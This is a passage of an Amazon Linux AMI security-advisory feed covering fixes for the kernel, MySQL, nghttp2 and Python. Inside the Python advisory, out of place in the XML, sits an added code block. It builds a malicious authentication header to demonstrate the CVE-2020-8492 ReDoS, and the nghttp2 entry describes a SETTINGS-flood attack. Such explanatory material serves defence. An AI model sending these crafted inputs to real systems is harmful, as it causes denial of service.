version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.186-110.268.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1402</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1402: medium priority package update for mysql56</title><issued date="2020-07-27 23:14:00" /><updated date="2020-07-29 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2814:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.6.47 and prior, 5.7.28 and prior and 8.0.18 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830060: CVE-2020-2814 mysql: InnoDB unspecified vulnerability (CPU Apr 2020)
CVE-2020-2812:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830059: CVE-2020-2812 mysql: Server: Stored Procedure unspecified vulnerability (CPU Apr 2020)
CVE-2020-2804:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Memcached). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1830058: CVE-2020-2804 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2020)
CVE-2020-2780:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1830056: CVE-2020-2780 mysql: Server: DML unspecified vulnerability (CPU Apr 2020)
CVE-2020-2763:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830051: CVE-2020-2763 mysql: Server: Replication unspecified vulnerability (CPU Apr 2020)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2763" title="" id="CVE-2020-2763" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2780" title="" id="CVE-2020-2780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2804" title="" id="CVE-2020-2804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2812" title="" id="CVE-2020-2812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2814" title="" id="CVE-2020-2814" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-embedded-devel" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.49" 
release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.49" release="1.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-debuginfo-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.49-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1403</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1403: medium priority package update for mysql57</title><issued date="2020-07-27 23:17:00" /><updated date="2020-07-29 21:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2814:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.6.47 and prior, 5.7.28 and prior and 8.0.18 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830060: CVE-2020-2814 mysql: InnoDB unspecified vulnerability (CPU Apr 2020)
CVE-2020-2812:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830059: CVE-2020-2812 mysql: Server: Stored Procedure unspecified vulnerability (CPU Apr 2020)
CVE-2020-2804:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Memcached). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1830058: CVE-2020-2804 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2020)
CVE-2020-2780:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1830056: CVE-2020-2780 mysql: Server: DML unspecified vulnerability (CPU Apr 2020)
CVE-2020-2765:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830052: CVE-2020-2765 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2020)
CVE-2020-2763:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830051: CVE-2020-2763 mysql: Server: Replication unspecified vulnerability (CPU Apr 2020)
CVE-2020-2760:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1830082: CVE-2020-2760 mysql: InnoDB unspecified vulnerability (CPU Apr 2020)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2760" title="" id="CVE-2020-2760" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2763" title="" id="CVE-2020-2763" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2765" title="" id="CVE-2020-2765" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2780" title="" id="CVE-2020-2780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2804" title="" id="CVE-2020-2804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2812" title="" id="CVE-2020-2812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2814" title="" id="CVE-2020-2814" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-test" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.30" release="1.15.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.30" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.30-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1404</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1404: important priority package update for nghttp2</title><issued date="2020-07-27 23:18:00" /><updated date="2020-07-29 21:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11080:
In nghttp2 before version 1.41.0, an overly large HTTP/2 SETTINGS frame payload causes a denial of service. The proof of concept attack involves a malicious client constructing a SETTINGS frame with a length of 14,400 bytes (2400 individual settings entries) over and over again. The attack causes the CPU to spike at 100%. nghttp2 v1.41.0 fixes this vulnerability. There is a workaround to this vulnerability: implement the nghttp2_on_frame_recv_callback callback, and if the received frame is a SETTINGS frame and the number of settings entries is large (e.g., > 32), drop the connection.
1844929: CVE-2020-11080 nghttp2: overly large SETTINGS frames can lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11080" title="" id="CVE-2020-11080" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libnghttp2-devel" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.33.0-1.1.6.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.6.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.33.0-1.1.6.amzn1.x86_64.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.33.0-1.1.6.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.33.0-1.1.6.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.6.amzn1.i686.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.33.0-1.1.6.amzn1.i686.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.33.0-1.1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1406</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1406: medium priority package update for python26</title><issued date="2020-07-27 23:54:00" /><updated date="2020-07-29 21:38:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8492:
Python 2.7 through 2.7.17, 3.5 through 3.5.9, 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1 allows an HTTP server to conduct Regular Expression Denial of Service (ReDoS) attacks against a client because of urllib.request.AbstractBasicAuthHandler catastrophic backtracking.
1809065: CVE-2020-8492 python: wrong backtracking in urllib.request.AbstractBasicAuthHandler allows for a ReDoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8492" title="" id="CVE-2020-8492" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-debuginfo" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" 
release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1407</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1407: medium priority package update for python27 python34 python35 python36</title><issued date="2020-07-27 23:54:00" /><updated date="2023-02-17 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8492:
Python 2.7 through 2.7.17, 3.5 through 3.5.9, 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1 allows an HTTP server to conduct Regular Expression Denial of Service (ReDoS) attacks against a client because of urllib.request.AbstractBasicAuthHandler catastrophic backtracking.
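The catastrophic backtracking named above, as an added worked example (the editor's code, not part of this advisory or of CPython; only the two regular expressions are reproduced from urllib.request, the pre-fix and post-fix rx of AbstractBasicAuthHandler). parse_challenges() applies either pattern with finditer, as the fixed urllib does, and the hostile header it times is constructed here.

```python
import re
import time

# Pattern used by urllib.request.AbstractBasicAuthHandler.rx before the fix
# (up to 2.7.17 / 3.8.1). The leading (?:.*,)* is a greedy quantifier nested
# inside a repeated group: on a value that never reaches "realm=" the engine
# re-tries every way of splitting the text at its commas before giving up.
VULNERABLE_RX = re.compile(
    r'(?:.*,)*[ \t]*([^ \t]+)[ \t]+realm=(["\']?)([^"\']*)\2', re.I)

# Pattern from the fix (2.7.18 / 3.8.2 and the backports): each challenge is
# anchored at the start of the value or at a comma, and the scheme token may
# not contain a comma, so no position is revisited more than a fixed number
# of times.
HARDENED_RX = re.compile(
    r'(?:^|,)[ \t]*([^ \t,]+)[ \t]+realm=(["\']?)([^"\']*)\2', re.I)


def parse_challenges(header, rx=HARDENED_RX):
    """Return [(scheme, realm), ...] for each challenge in a
    WWW-Authenticate or Proxy-Authenticate value."""
    return [(m.group(1).lower(), m.group(3)) for m in rx.finditer(header)]


def hostile_header(n):
    """Constructed server response: n commas then a bare token and no realm.
    A malicious server sends this as the WWW-Authenticate value of a 401;
    n is all the attacker has to choose."""
    return ',' * n + 'x'


def search_seconds(rx, header):
    """Wall-clock seconds for a single rx.search(header)."""
    start = time.perf_counter()
    rx.search(header)
    return time.perf_counter() - start


if __name__ == '__main__':
    print(parse_challenges('Digest realm="api", Basic realm="files"'))
    # The vulnerable pattern's time roughly doubles with each extra comma;
    # the hardened one stays flat. n is kept small so this returns quickly.
    for n in (8, 10, 12, 14, 16):
        h = hostile_header(n)
        print(n, '%.4f' % search_seconds(VULNERABLE_RX, h),
              '%.6f' % search_seconds(HARDENED_RX, h))
```

Note that the greedy (?:.*,)* prefix in the old pattern also swallows every challenge but the last, so on a multi-challenge header the two patterns do not even report the same scheme; the fix changed both the pattern and the loop around it.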
CVE-2019-18348:
A CRLF injection flaw was discovered in python in the way URLs are handled when doing an HTTP/HTTPS connection (e.g. through urlopen() or HTTPConnection). An attacker who can control the url parameter passed to urlopen method in the urllib/urllib2 modules can inject CRLF sequences and HTTP headers by abusing the "host" part of the URL.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8492" title="" id="CVE-2020-8492" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" 
release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.50.amzn1" 